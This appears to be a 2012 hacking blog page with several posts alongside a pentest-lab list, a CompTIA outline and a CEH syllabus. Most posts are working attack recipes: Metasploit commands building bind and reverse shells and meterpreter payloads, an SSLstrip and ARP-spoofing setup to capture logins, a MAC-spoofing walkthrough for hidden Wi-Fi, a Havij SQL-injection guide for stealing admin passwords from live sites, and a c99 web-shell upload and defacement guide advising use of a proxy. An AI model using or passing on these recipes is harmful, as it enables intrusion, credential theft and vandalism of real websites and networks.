THE NEXT GENERATION OF COMPUTING

The ComputerManiac is for those who are Craze about computers.

HACKERS ARE HERE

ComputerManiac is connected to the ChennaiHackers community.

FIND EVERYTHING HERE

Feel free,This the platform for computer experts.

JOIN US

CONNECT WITH EXPERTS TO BECOME AN EXPERT

ASK US

FEEL FREE TO REACH US

Friday, 14 December 2012

Bypass Hidden SSID & MAC Address Filtering




The purpose of this blog post is to demonstrate why hidden SSID & MAC Address filtering should only be layers of wireless security used in conjunction with strong encryption such as WPA.

Below are the steps an attacker could take to bypass a hidden SSID and MAC Address filtering to gain a foothold on your network and either instigate further attacks or use your internet connection.

Tools
  • Kismet

The Attack

1. I first use kismet to look at the wireless networks within range.



My target wireless network is "batman". I can see from kismet that this has no encryption and the SSID is hidden.

At this stage I wouldn't know that the AP was using MAC Address filtering so I could try to join the network using:

iwconfig eth1 essid batman

Then I would try to obtain an IP address using:

dhclient eth1

The request for an IP Address would fail as the WAP is filtering MAC addresses.


2. Within Kismet I look at the clients connected to "batman" to obtain a valid client MAC address.



I see an active client is using the MAC of 00:16:6F:4D:AE:8C

I could then either wait for the client to disconnect or use a tool such as aireplay-ng to force a disconnection. As this is a test lab I will simply disconnect the valid client.


3. I check my current wireless card config using ifconfig



Note: I see that Kismet has not brought the card out of promiscuous mode. This will need to be done manually.


4. I now want take my card out of promiscuous mode, change my MAC address to that of the valid client, and join the hidden (batman) network. To do this I use the following commands:

ifconfig eth1 -promisc
ifconfig eth1 down
ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
ifconfig eth1 up
iwconfig eth1 essid batman



I verify the output of these commands with ifconfig and iwconfig as i go along.


5. I now request an IP address from the DHCP server on the WAP using:

dhclient eth1



I have successfully been assigned an IP address of 192.168.1.202 from the WAP (192.168.1.5 hmmm this is useful to know as I can try the web interface on that using either default passwords (Kismet will tell me the make of the WAP) or hydra........)

If the WAP was not using DHCP I would at this stage configure my card manually and set up my own DNS.


7. I now test connectivity to the web using ping:

ping www.yahoo.com



my ping works, this tells me I have web access and DNS is working correctly.

Metasploit Payloads Tutorial


Metasploit Payloads - msfpayload


This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E 



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe


UPDATE: Payload for 6 should read:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe

Sunday, 2 December 2012

OPH crack Live CD

Ophcrack  is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.



Features:
  • Runs on Windows, Linux/Unix, Mac OS X, ...
  • Cracks LM and NTLM h ashes.
  • Free tables available for Windows XP and Vista.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
  • Free and open source software (GPL).


                                                            

Monday, 19 November 2012

SSL Strip using Backtrack


SSL Strip is a tool that hijacks HTTP traffic on a network by replacing all the HTTPS/SSL links with HTTP ones. Once SSL Strip is setup all the victim traffic will be routed through the attacker and HTTP traffic will be redirected to the attacker machine. The attacker will be able to obtain all logon information by sniffing the HTTP plaintext protocol.

How to:
1. Set up IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

2. Set up Port redirection using iptables
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1337

3. Start ARP MITM
arpspoof -i eth0 -t VICTIMIP GATEWAY

4. Start SSL Strip Tool
sslstrip -l 1337 -w log.txt

5. Wait until the target login to a website that supposed to use HTTPS/SSL

6. Check log.txt for captured information

Wednesday, 14 November 2012

Pentest lab


Pentest lab vulnerable servers-applications list



In this post I’m going to present some useful resources to learn about penetration testing and where to use exploitation tools and techniques in a safe and legal environment. This list contain a set of  deliberately insecure LiveCDs, Virtual machines and applicarions designed to be used as targets for enumeration, web exploitation, password cracking and reverse  engineering.
If you have other links/distribution/virtual machines, please leave a comment.
List updated on 13/9/2011
UltimateLAMP
UltimateLAMP is a Ubuntu VM  running vulnerable services and containing weak accounts.
The UltimateLAMP VM runs the following services:Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)
webgoat
WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.
Holynix
Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example.
http://pynstrom.net/index.php?page=holynix.php
WackoPicko
WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks
Metasploitable
Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html
Owaspbwa
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.
http://code.google.com/p/owaspbwa/
Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
http://www.mavensecurity.com/web_security_dojo/
Lampsecurity
LAMPSecurity training is designed to be a series of vunlerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.
http://sourceforge.net/projects/lampsecurity/files/
Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
www.dvwa.co.uk
Hacking-Lab
This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized client environment for solving our Hacking-Lab wargame challenges from remote.
http://www.hacking-lab.com/hl_livecd/
Moth 
Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
http://www.bonsai-sec.com/en/research/moth.php
Exploit kb vulnerable web app
exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques This is a fully functional web site with a content management system based on fckeditor. You can download it as source code or a pre configured.
http://sourceforge.net/projects/exploitcoilvuln/
Gruyere
This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution. To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).
Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
http://www.damnvulnerablelinux.org
pWnOS
pWnOS is on a “VM Image”, that creates a target on which to practice penetration testing; with the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points
http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html
Virtual Hacking Lab
A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats.
http://sourceforge.net/projects/virtualhacking/files/
Badstore
Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.
http://www.badstore.net/
BodgeIt Store
The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
Hackademic Challenges
The OWASP Hackademic Challenges , is an open source project that can be used to test and improve one’s knowledge of information system and web application security. The OWASP Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe, controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker’s perspective.
OWASP Vicnum Project
A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ . Play the game at http://vicnum.ciphertechs.com
Stanford SecuriBench
Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.
Kioptrix
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
hackxor
Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc
Project GameOver:
Project GameOver was started with the objective of training and educating newbies about the basics of web security and educate them about the common web attacks and help them understand how they work. It is collection of various vulnerable web applications, designed for the purpose of learning web penetration testing. We have included some of the above mentioned deliberately vulnerable websites.

Tuesday, 13 November 2012

Comptia N+ Ebook







LESSON 1: Basic Network Theory
Network Definitions
Network Models
Connectivity
Network Addressing
Signaling Concepts

LESSON 2: Network Connectivity
The Data Package
Establishing a Connection
Reliable Delivery
Network Connectivity
Noise Control
Building Codes
Connection Devices

LESSON 3: Advanced Network Theory
The OSI Model
Ethernet
Network Resources
Token Ring/IEEE 802.5
FDDI
Wireless Networking

LESSON 4: Common Network Protocols
Families of Protocols
NetBEUI
Bridges and Switches
The TCP/IP Protocol
Building a TCP/IP Network
The TCP/IP Suite

LESSON 5: TCP/IP Services
Dynamic Host Configuration Protocol
DNS Name Resolution
NetBIOS Support
SNMP
TCP/IP Utilities
Upper Layer Services: FTP

LESSON 6: Alternate Network Protocols
Introduction to IPX/SPX
AppleTalk
Introduction to Apple Open Transport
Introduction to IPv6

LESSON 7: Network LAN Infrastructure
Implement LAN Protocols on a Network
IP Routing
IP Routing Tables
Router Discovery Protocols
Data Movement in a Routed Network
Virtual LANs (VLANs)

LESSON 8: Network WAN Infrastructure
The WAN Environment
WAN Transmission Technologies
WAN Connectivity Devices
Voice Over Data Services

LESSON 9: Remote Networking
Remote Networking
Remote Access Protocols
VPN Technologies

LESSON 10: Network Security
Introduction to Network Security
Virus Protection
Local Security
Network Access
Internet Security

LESSON 11: Disaster Recovery
The Need for Disaster Recovery
Disaster Recovery Plan
Data Backups
Fault Tolerance

LESSON 12: Advanced Data Storage Techniques
Enterprise Data Storage
Clustering
Network Attached Storage
Storage Area Networks

LESSON 13: Network Troubleshooting
Using a Systematic Approach to Troubleshooting
Network Support Tools: Utilities
The Network Baseline

LESSON 14: Network Operating Systems
Novell NetWare
Microsoft BackOffice
Linux History and Operation
Macintosh

LESSON 15: Appendix
Appendix


Thursday, 8 November 2012

Kaspersky full version activator

Kaspersky activator





Saturday, 3 November 2012

Havij Tutorial-Website Hacking


Havij Tutorial-Website Hacking


  it is simple tut how to use havij to hack sites
                                                           
                                                          Click Here To Download Havij

1.First Find a sqli infected site
GOTO



2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name l
ike xxxx_xxxx

4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed
 

5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

6. In that Just put mark username and password and click "Get data"

7. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure..




For SQL Dorks List Click Here And Download it Now

Hack Website

Upload Shell and Deface a Website







What we need:

1-A Shell (Will be provided)

2-A website vulnerable to SQLi

3-Image or File upload area on that Vulnerable website

So firstly download the shell here.

Download


What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )


So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

Now login to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (Usually a picture).

Now you have to upload the shell. Right if you don’t get an error it is all good.

Now to find the shell

Go through the site until you find any image and if you are using firefox Right

- Click on it and “Copy Image Location”

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

Now a page will come up looking like this:

igz03k How To Upload Shell and Deface Tutorial

Does probably not look like that but will look similar.

Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

Keep in mind:

• Change Admin Username and Password

•The people have FTP access so you need to change that Password too .

•Always use a Proxy or VPN

Online hacking Tools


Online Tools




Footprinting 


Hash Cracking


Converters

Binary Translator

Ethical Hacking Syllabus overview


Certified Ethical Hacker


Certified Ethical Hacker (312-50) CEH
1.CEH Ethics and Legal Issues12.CEH Web Application Vulnerabilities
2.CEH Footprinting 13.CEH Web Based Password Cracking Techniques
3.CEH Scanning 14.CEH SQL Injection
4.CEH Enumeration 15.CEH Hacking Wireless Networks
5.CEH System Hacking 16.CEH Virus and Worms
6.CEH Trojans and Backdoors 17.CEH Hacking Novell
7.CEH Sniffers 18.CEH Hacking Linux
8.CEH Denial of Service 19.CEH IDS, Firewalls and Honeypots
9.CEH Social Engineering 20.CEH Buffer Overflows
10.CEH Session Hijacking21.CEH Cryptography
11.CEH Hacking Web Servers22.CEH Penetration Testing Methodologies

Certified Ethical Hacker (CEH) Module 1: Ethics and Legality
  • What is an Exploit?
  • The security functionality triangle
  • The attacker's process
  • Passive reconnaissance
  • Active reconnaissance
  • Types of attacks
  • Categories of exploits
  • Goals attackers try to achieve
  • Ethical hackers and crackers - who are they
  • Self proclaimed ethical hacking
  • Hacking for a cause (Hacktivism)
  • Skills required for ethical hacking
  • Categories of Ethical Hackers
  • What do Ethical Hackers do?
  • Security evaluation plan
  • Types of Ethical Hacks
  • Testing Types
  • Ethical Hacking Report
  • Cyber Security Enhancement Act of 2002
  • Computer Crimes
  • Overview of US Federal Laws
  • Section 1029
  • Section 1030
  • Hacking Punishment

Certified Ethical Hacker (CEH) Module 2: Footprinting
  • What is Footprinting
  • Steps for gathering information
  • Whois
  • http://tucows.com
  • Hacking Tool: Sam Spade
  • Analyzing Whois output
  • NSLookup
  • Finding the address range of the network
  • ARIN
  • Traceroute
  • Hacking Tool: NeoTrace
  • Visual Route
  • Visual Lookout
  • Hacking Tool: Smart Whois
  • Hacking Tool: eMailTracking Pro
  • Hacking Tool: MailTracking.com

Certified Ethical Hacker (CEH) Module 3: Scanning
  • Determining if the system is alive?
  • Active stack fingerprinting
  • Passive stack fingerprinting
  • Hacking Tool: Pinger
  • Hacking Tool: Friendly Pinger
  • Hacking Tool: WS_Ping_Pro
  • Hacking Tool: Netscan Tools Pro 2000
  • Hacking Tool: Hping2
  • Hacking Tool: KingPing
  • Hacking Tool: icmpenum
  • Hacking Tool: SNMP Scanner
  • Detecting Ping sweeps
  • ICMP Queries
  • Hacking Tool: netcraft.com
  • Port Scanning
  • TCPs 3-way handshake
  • TCP Scan types
  • Hacking Tool: IPEye
  • Hacking Tool: IPSECSCAN
  • Hacking Tool: nmap
  • Port Scan countermeasures
  • Hacking Tool: HTTrack Web Copier
  • Network Management Tools
  • SolarWinds Toolset
  • NeoWatch
  • War Dialing
  • Hacking Tool: THC-Scan
  • Hacking Tool: PhoneSweep War Dialer
  • Hacking Tool: Telesweep
  • Hacking Tool: Queso
  • Hacking Tool: Cheops
  • Proxy Servers
  • Hacking Tool: SocksChain
  • Surf the web anonymously
  • TCP/IP through HTTP Tunneling
  • Hacking Tool: HTTPort
  • Hacking Tool: Tunneld
  • Hacking Tool: BackStealth

Certified Ethical Hacker (CEH) Module 4: Enumeration
  • Determining if the system is alive?
  • What is Enumeration
  • NetBios Null Sessions
  • Null Session Countermeasures
  • NetBIOS Enumeration
  • Hacking Tool: DumpSec
  • Hacking Tool: Hyena
  • Hacking Tool: NAT
  • SNMP Enumertion
  • SNMPUtil
  • Hacking Tool: IP Network Browser
  • SNMP Enumeration Countermeasures
  • Windows 2000 DNS Zone transfer
  • Identifying Win2000 Accounts
  • Hacking Tool: User2SID
  • Hacking Tool: SID2User
  • Hacking Tool: Enum
  • Hacking Tool: UserInfo
  • Hacking Tool: GetAcct
  • Hacking Tool: smbbf
  • SMB Auditing Tools
  • Active Directory Enumeration
  • W2K Active Directory attack


Certified Ethical Hacker (CEH) Module 5: System Hacking
  • Administrator Password Guessing
  • Performing Automated Password Guessing
  • Legion
  • NTInfoScan
  • Defending Against Password Guessing
  • Monitoring Event Viewer Logs
  • VisualLast
  • Eavesdroppin on Network Password Exchange
  • Hacking Tool: L0phtCrack
  • Hacking Tool: KerbCrack
  • Privilege Escalation
  • Hacking Tool: GetAdmin
  • Hacking Tool: hk
  • Manual Password Cracking Algorithm
  • Automatic Password Cracking Algorithm
  • Password Types
  • Types of Password Attacks
  • Dictionary Attack
  • Brute Force Attack
  • Distributed Brute Force Attack
  • Password Change Interval
  • Hybrid Attack
  • Cracking Windows 2000 Passwords
  • Retrieving the SAM file
  • Redirecting SMB Logon to the Attacker
  • SMB Redirection
  • Hacking Tool: SMBRelay
  • Hacking Tool: SMBRelay2
  • Hacking Tool: pwdump2
  • Hacking Tool: SAMdump
  • Hacking Tool: C2MYAZZ
  • Win32 Create Local Admin User
  • Offline NT Password Resetter
  • Hacking Tool: psexec
  • Hacking Tool: remoxec
  • SMBRelay Man-in-the-Middle (MITM)
  • SMBRelay MITM Countermeasures
  • Hacking Tool: SMBGrinder
  • Hacking Tool: SMBDie
  • Hacking Tool: NBTDeputy
  • NetBIOS DoS Attack
  • Hacking Tool: nbname
  • Hacking Tool: John the Ripper
  • LanManager Hash

Certified Ethical Hacker (CEH) Module 6: Trojans and Backdoors
  • What is a Trojan Horse?
  • Overt and Covert
  • Hacking Tool: QAZ
  • Hacking Tool: Tini
  • Hacking Tool: Netcat
  • Hacking Tool: Donald Dick
  • Hacking Tool: SubSeven
  • Hacking Tool: BackOrifice 2000
  • Back Oriffice Plug-ins
  • BoSniffer
  • Hacking Tool: NetBus
  • ComputerSpy Key Logger
  • Hacking Tool: Beast Trojan
  • Hacking Tool: CyberSpy Telnet Trojan
  • Hacking Tool: SubRoot Telnet Trojan
  • Hacking Tool: LetMeRule
  • Wrappers
  • Hacking Tool: Graffiti
  • Hacking Tool: Silk Rope 2000
  • Hacking Tool: EliteWrap
  • Hacking Tool: IconPlus
  • Packaging Tool: Microsoft WordPad

  • Hacking Tool: Whack a Mole Trojan Construction Kit
  • Writing Trojans in Java
  • Hacking Tool: FireKiller 2000
  • Covert Channels
  • ICMP Tunneling
  • Hacking Tool: Loki
  • Reverse WWW Shell
  • Backdoor Countermeasures
  • BO Startup and Registry Entries
  • NetBus Startup and Registry Keys
  • Port Monitoring Tools
  • fPort
  • TCPView
  • Process Viewer
  • Inzider - Tracks Processes and Ports
  • Trojan Maker
  • Hacking Tool: Hard Disk Killer
  • Man-in-the-Middle Attack
  • Hacking Tool: dsniff
  • System File Verification
  • TripWire
Certified Ethical Hacker (CEH) Module 7: Sniffers
  • What is a Sniffer?
  • Hacking Tool: Ethereal
  • Hacking Tool: Snort
  • Hacking Tool: WinDump
  • Hacking Tool: EtherPeek
  • Passive Sniffing
  • Active Sniffing
  • Hacking Tool: EtherFlood
  • How ARP Works?
  • Hacking Tool: ArpSpoof
  • Hacking Tool: DSniff
  • Hacking Tool: Macof
  • Hacking Tool: mailsnarf
  • Hacking Tool: URLsnarf
  • Hacking Tool: Webspy
  • Hacking Tool: Ettercap

  • Hacking Tool: WebMiTM
  • IP Restrictions Scanner
  • Hacking Tool: sTerm
  • Hacking Tool: Cain and Abel
  • Hacking Tool: Packet Crafter
  • Hacking Tool: SMAC
  • MAC Changer
  • ARP Spoofing Countermeasures
  • Hacking Tool: WinDNSSpoof
  • Hacking Tool: Distributed DNS Flooder
  • Hacking Tool: WinSniffer
  • Network Tool: IRIS
  • Network Tool: NetInterceptor
  • SniffDet
  • Hacking Tool: WinTCPKill
Certified Ethical Hacker (CEH) Module 8: Denial of Service
  • What is Denial of Service Attack?
  • Types of DoS Attacks
  • How DoS Work?
  • What is DDoS?
  • Hacking Tool: Ping of Death
  • Hacking Tool: SSPing
  • Hacking Tool: Land
  • Hacking Tool: Smurf
  • Hacking Tool: SYN Flood
  • Hacking Tool: CPU Hog
  • Hacking Tool: Win Nuke
  • Hacking Tool: RPC Locator
  • Hacking Tool: Jolt2
  • Hacking Tool: Bubonic
  • Hacking Tool: Targa
  • Tools for Running DDoS Attacks

  • Hacking Tool: Trinoo
  • Hacking Tool: WinTrinoo
  • Hacking Tool: TFN
  • Hacking Tool: TFN2K
  • Hacking Tool: Stacheldraht
  • Hacking Tool: Shaft
  • Hacking Tool: mstream
  • DDoS Attack Sequence
  • Preventing DoS Attack
  • DoS Scanning Tools
  • Find_ddos
  • SARA
  • DDoSPing
  • RID
  • Zombie Zapper
Certified Ethical Hacker (CEH) Module 9: Social Engineering
  • What is Social Engineering?
  • Art of Manipulation
  • Human Weakness
  • Common Types of Social Engineering
  • Human Based Impersonation
  • Important User
  • Tech Support
  • Third Party Authorization
  • In Person
  • Dumpster Diving

  • Shoulder Surfing
  • Computer Impersonation
  • Mail Attachments
  • Popup Windows
  • Website Faking
  • Reverse Social Engineering
  • Policies and Procedures
  • Social Engineering Security Policies
  • The Importance of Employee Education
Certified Ethical Hacker (CEH) Module 10: Session Hijacking
  • What is Session Hijacking?
  • Session Hijacking Steps
  • Spoofing Vs Hijacking
  • Active Session Hijacking
  • Passive Session Hijacking
  • TCP Concepts - 3 way Handshake
  • Sequence Numbers
  • Sequence Number Example
  • Guessing the Sequence Numbers

  • Hacking Tool: Juggernaut
  • Hacking Tool: Hunt
  • Hacking Tool: TTYWatcher
  • Hacking Tool: IP Watcher
  • Hacking Tool: T-Sight
  • Remote TCP Session Reset Utility
  • Dangers Posed by Session Hijacking
  • Protection against Session Hijacking
Certified Ethical Hacker (CEH) Module 11: Hacking Web Servers
  • Apache Vulnerability
  • Attacks against IIS
  • IIS Components
  • ISAPI DLL Buffer Overflows
  • IPP Printer Overflow
  • msw3prt.dll
  • Oversized Print Requests
  • Hacking Tool: Jill32
  • Hacking Tool: IIS5-Koei
  • Hacking Tool: IIS5Hack
  • IPP Buffer Overflow Countermeasures
  • ISAPI DLL Source Disclosure
  • ISAPI.DLL Exploit
  • Defacing Web Pages
  • IIS Directory Traversal
  • Unicode
  • Directory Listing
  • Clearing IIS Logs
  • Network Tool: LogAnalyzer
  • Attack Signature
  • Creating Internet Explorer (IE) Trojan
  • Hacking Tool: IISExploit

  • Hacking Tool: UnicodeUploader.pl
  • Hacking Tool: cmdasp.asp
  • Escalating Privilages on IIS
  • Hacking Tool: IISCrack.dll
  • Hacking Tool: ispc.exe
  • IIS WebDav Vulnerability
  • Hacking Tool: WB
  • RPC Exploit-GUI
  • Hacking Tool: DComExpl_UnixWin32
  • Hacking Tool: Plonk
  • Unspecified Executable Path Vulnerability
  • Hacking Tool: CleanIISLog
  • File System Traversal Countermeasures
  • Microsoft HotFix Problems
  • UpdateExpert
  • Cacls utility
  • Network Tool: Whisker
  • N-Stealth Scanner
  • Hacking Tool: WebInspect
  • Network Tool: Shadow Security Scanner
Certified Ethical Hacker (CEH) Module 12: Web Application Vulnerabilities
  • Documenting the Application Structure
  • Manually Inspecting Applications
  • Using Google to Inspect Applications
  • Directory Structure
  • Hacking Tool: Instant Source
  • Java Classes and Applets
  • Hacking Tool: Jad
  • HTML Comments and Contents
  • Hacking Tool: Lynx
  • Hacking Tool: Wget
  • Hacking Tool: Black Widow
  • Hacking Tool: WebSleuth
  • Cross Side Scripting
  • Session Hijacking using XSS
  • Cookie Stealing
  • Hacking Tool: IEEN
  • Hacking Tool: IEflaw
  • Exposing Sensitive Data with Google

Certified Ethical Hacker (CEH) Module 13: Web Based Password Cracking Techniques
  • Basic Authentication
  • Message Digest Authentication
  • NTLM Authentication
  • Certificate based Authentication
  • Digital Certificates
  • Microsoft Passport Authentication
  • Forms based Authentication
  • Creating Fake Certificates
  • Hacking Tool: WinSSLMiM
  • Password Guessing
  • Dfault Account Database
  • Hacking Tool: WebCracker
  • Hacking Tool: Brutus
  • Hacking Tool: ObiWan
  • Hacking Tool: Munga Bunga
  • Password dictionary Files
  • Attack Time
  • Hacking Tool: Variant
  • Hacking Tool: PassList
  • Query Strings
  • Post data
  • Hacking Tool: cURL
  • Stealing Cookies
  • Hacking Tool: CookieSpy
  • Hacking Tool: ReadCookies
  • Hacking Tool: SnadBoy

Certified Ethical Hacker (CEH) Module 14: SQL Injection
  • What is SQL Injection Vulnerability?
  • SQL Insertion Discovery
  • Blank sa Password
  • Simple Input Validation
  • SQL Injection
  • OLE DB Errors
  • 1=1
  • blah' or 1=1
  • Preventing SQL Injection
  • Database Specific SQL Injection
  • Hacking Tool: SQLDict
  • Hacking Tool: SQLExec
  • Hacking Tool: SQLbf
  • Hacking Tool: SQLSmack
  • Hacking Tool: SQL2.exe
  • Hacking Tool: Oracle Password Buster

Certified Ethical Hacker (CEH) Module 15: Hacking Wireless Networks
  • 802.11 Standards
  • What is WEP?
  • Finding WLANs
  • Cracking WEP keys
  • Sniffing Trafic
  • Wireless DoS Attacks
  • WLAN Scanners
  • WLAN Sniffers
  • MAC Sniffing
  • Access Point Spoofing
  • Securing Wireless Networks
  • Hacking Tool: NetTumbler
  • Hacking Tool: AirSnort
  • Hacking Tool: AiroPeek
  • Hacking Tool: WEP Cracker
  • Hacking Tool: Kismet
  • Hacking Tool: AirSnarf
  • WIDZ- Wireless IDS

Certified Ethical Hacker (CEH) Module 16: Virus and Worms
  • Cherobyl
  • ExploreZip
  • I Love You
  • Melissa
  • Pretty Park
  • Code Red Worm
  • W32/Klez
  • BugBear

  • W32/Opaserv Worm
  • Nimda
  • Code Red
  • SQL Slammer
  • Batch File Virus Creator
  • How to write your own Virus?
  • Worm Construction Kits
Certified Ethical Hacker (CEH) Module 17: Novell Hacking
  • Common accounts and passwords
  • Accessing password files
  • Password crackers
  • Netware Hacking Tools
  • Chknull
  • NOVELBFH
  • NWPCRACK
  • Bindery
  • BinCrack
  • SETPWD.NLM
  • Kock
  • userdump
  • Burglar
  • Getit
  • Spooflog
  • Gobbler
  • Novelffs
  • Pandora

Certified Ethical Hacker (CEH) Module 18: Linux Hacking
  • Why Linux ?
  • Linux Basics
  • Compiling Programs in Linux
  • Scanning Networks
  • Mapping Networks
  • Password Cracking in Linux
  • Linux Vulnerabilities
  • SARA

  • TARA
  • Sniffing
  • A Pinger in Disguise
  • Session Hijacking
  • Linux Rootkits
  • Linux Security Countermeasures
  • IPChains and IPTables
Certified Ethical Hacker (CEH) Module 19: IDS, Firewalls and Honeypots
